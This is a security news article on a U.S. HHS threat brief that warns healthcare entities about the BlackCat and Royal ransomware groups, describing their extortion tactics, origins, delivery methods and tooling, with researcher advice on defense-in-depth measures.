Healthcare entities should be on high alert for signs of the BlackCat and Royal ransomware-as-a-service groups, warns the U.S. government, which characterizes the groups as “relatively new but highly capable” threats.
The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center in a Thursday threat brief warns that BlackCat conducts triple extortion, meaning it doesn’t just maliciously encrypt data and demand an extortion payment, but also threatens to leak the data and conduct distributed denial-of-service attacks against victims if they don’t pay up. Royal hews to the now more traditional double-extortion method of demanding a ransomware payment backed with the threat of a data breach.
Each group has roots in earlier ransomware groups. BlackCat, also known as Alphv, is suspected of being a successor group to Darkside and BlackMatter, with ties to some former REvil members, and Royal is known to have former operators from cybercriminal group Conti Team One.
BlackCat asserts that it doesn’t target healthcare providers, but “they have also been open about the fact that insurance companies, pharmaceutical companies, and others are not providers – so it’s important not to let statements like ‘BlackCat does not target healthcare,’ make us complacent,” says Erick Galinkin, principal artificial intelligence researcher at security firm Rapid7.
Royal doesn’t have BlackCat’s stated compunctions about targeting healthcare providers. “Royal is a particularly nasty strain of ransomware and features a significant number of evasion techniques,” Galinkin says.
The BlackCat ransomware-as-a-service group has demanded ransom payments as high as $1.5 million, and affiliates keep 80% to 90% of the extortion payments. “BlackCat tooling is constantly changing as they cycle through testing/usage, updating their arsenal frequently,” the alert says.
Security researchers have also found BlackCat attackers using a PowerShell command to download Cobalt Strike beacons on some affected systems, as well as pen-testing tool Brute Ratel, which has “Cobalt Strike-like remote access features” (see: BlackCat Adds Brute Ratel Pentest Tool to Attack Arsenal).
BlackCat uses two encryption algorithms – ChaCha20 and AES – and six encryption modes, including Full, HeadOnly, DotPattern, SmartPattern, AdvancedSmartPattern and Auto.
BlackCat’s latest ransomware, written in the memory-safe, multiplatform language Rust, provides a lot of flexibility and power to the group, Galinkin says.
Alpha Spider, a developer and operator in the BlackCat ransomware-as-a-service network active since late 2021, was one of the most prolific ransomware operators of 2022, says Adam Meyers, senior vice president of intelligence at security firm Crowdstrike.
Royal was also the subject of a separate HHS HC3 security alert in December that cautioned the healthcare care sector of surging ransomware attacks across the globe, with U.S. entities a top target (see: Royal Ransomware Hitting Healthcare Targets and Dumping Data).
The new HHS HC3 alert says that in September, researchers observed that Royal’s developers had begun using other groups’ encryptors, including one from BlackCat, before switching to their own encryptor, called Zeon. HC3 says the group later renamed its encryptor Royal. The ransomware deletes all shadow copies that provide point-in-time copy of a file, the alert says.
Ransom demands in Royal attacks have ranged from $250,000 to more than $2 million. Royal delivery methods include using Google Ads in a campaign to blend in with normal ad traffic, making malicious downloads appear authentic by hosting fake installer files on legitimate-looking software download sites and using contact forms located on an organization’s website to distribute phishing links.
Royal is a multithreaded ransomware that uses a unique approach to evade anti-ransomware defenses. The group operates globally.
“The good news is that in general, these threat actors are still using well-known loaders like QBot, and use back doors like Cobalt Strike for persistence and command and control,” Galinkin says. “This means that a solid defense-in-depth strategy designed to detect these sorts of common techniques and make lateral movement difficult will be effective in preventing the operations of these actors in the network, no matter how impressive the malware itself is,” he says.
Nonetheless, “the things we know we should do like network segmentation, egress filtering, and separation of privileges often fall to the wayside given the time demands of our profession,” he says. “But these building blocks provide some of the most robust protection against ransomware gangs, even as they evolve their tactics.”